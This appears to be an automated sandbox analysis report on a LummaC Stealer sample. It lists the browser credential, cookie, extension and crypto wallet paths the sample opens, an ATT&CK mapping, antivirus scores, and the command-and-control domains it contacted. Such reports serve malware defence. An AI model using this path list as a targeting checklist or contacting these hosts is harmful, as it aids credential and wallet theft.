            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWYJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
            Source: C:\Users\user\Desktop\20qMFnd9tO.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
            Source: Yara matchFile source: Process Memory Space: 20qMFnd9tO.exe PID: 7556, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 20qMFnd9tO.exe PID: 7556, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		11
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Screen Capture            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory11
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares31
            Data from Local System            		113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information            		NTDS1
            File and Directory Discovery            		Distributed Component Object Model2
            Clipboard Data            		Protocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Software Packing            		LSA Secrets12
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            20qMFnd9tO.exe39%ReversingLabs
            20qMFnd9tO.exe39%VirustotalBrowse
            20qMFnd9tO.exe100%AviraHEUR/AGEN.1316639
            20qMFnd9tO.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            wagonglidemonkywo.shop1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            https://wagonglidemonkywo.shop:443/api100%Avira URL Cloudmalware
            https://wagonglidemonkywo.shop/j0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/0%Avira URL Cloudsafe
            pillowbrocccolipe.shop0%Avira URL Cloudsafe
            communicationgenerwo.shop0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/api20%Avira URL Cloudsafe
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/C0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop:443/api10%VirustotalBrowse
            https://wagonglidemonkywo.shop/1%VirustotalBrowse
            pillowbrocccolipe.shop2%VirustotalBrowse
            https://wagonglidemonkywo.shop/A0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/80%Avira URL Cloudsafe
            enthusiasimtitleow.shop0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/S0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/api100%Avira URL Cloudmalware
            https://wagonglidemonkywo.shop/apiy0%Avira URL Cloudsafe
            communicationgenerwo.shop2%VirustotalBrowse
            wagonglidemonkywo.shop0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/api10%VirustotalBrowse
            worryfillvolcawoi.shop0%Avira URL Cloudsafe
            enthusiasimtitleow.shop2%VirustotalBrowse
            https://support.microsof0%Avira URL Cloudsafe
            dismissalcylinderhostw.shop0%Avira URL Cloudsafe
            diskretainvigorousiw.shop0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/$0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/apiM0%Avira URL Cloudsafe
            worryfillvolcawoi.shop2%VirustotalBrowse
            https://wagonglidemonkywo.shop/d0%Avira URL Cloudsafe
            cleartotalfisherwo.shop0%Avira URL Cloudsafe
            affordcharmcropwo.shop0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/apiyi0%Avira URL Cloudsafe
            https://wagonglidemonkywo.shop/apiH0%Avira URL Cloudsafe
            affordcharmcropwo.shop2%VirustotalBrowse
            cleartotalfisherwo.shop2%VirustotalBrowse
            wagonglidemonkywo.shop1%VirustotalBrowse
            dismissalcylinderhostw.shop2%VirustotalBrowse
            diskretainvigorousiw.shop2%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            wagonglidemonkywo.shop
            		172.67.221.128
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            communicationgenerwo.shoptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            pillowbrocccolipe.shoptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            enthusiasimtitleow.shoptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://wagonglidemonkywo.shop/apifalse
            • 10%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            wagonglidemonkywo.shoptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            worryfillvolcawoi.shoptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            dismissalcylinderhostw.shoptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            diskretainvigorousiw.shoptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            cleartotalfisherwo.shoptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            affordcharmcropwo.shoptrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtab20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://duckduckgo.com/ac/?q=20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://wagonglidemonkywo.shop:443/api20qMFnd9tO.exe, 00000000.00000003.1704561901.0000000000824000.00000004.00000020.00020000.00000000.sdmpfalse
                • 10%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://wagonglidemonkywo.shop/j20qMFnd9tO.exe, 00000000.00000003.1670714016.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1655773543.0000000002D7B000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670305521.0000000002D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://wagonglidemonkywo.shop/20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1647929936.0000000002D7B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://wagonglidemonkywo.shop/api220qMFnd9tO.exe, 00000000.00000003.1631671750.0000000000839000.00000004.00000020.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1631574292.0000000000837000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.rootca1.amazontrust.com/rootca1.crl020qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://upx.sf.netAmcache.hve.3.drfalse
                      		high
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=20qMFnd9tO.exe, 00000000.00000003.1632292229.0000000002DB7000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://ocsp.rootca1.amazontrust.com0:20qMFnd9tO.exe, 00000000.00000003.1648424099.0000000002D95000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201620qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCC000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://wagonglidemonkywo.shop/C20qMFnd9tO.exe, 00000000.00000002.1815250772.0000000002D70000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e1720qMFnd9tO.exe, 00000000.00000003.1631970037.0000000002DCC000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://wagonglidemonkywo.shop/A20qMFnd9tO.exe, 00000000.00000003.1670761878.0000000002DE2000.00000004.00000800.00020000.00000000.sdmp, 20qMFnd9tO.exe, 00000000.00000003.1670659108.0000000002DDF000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
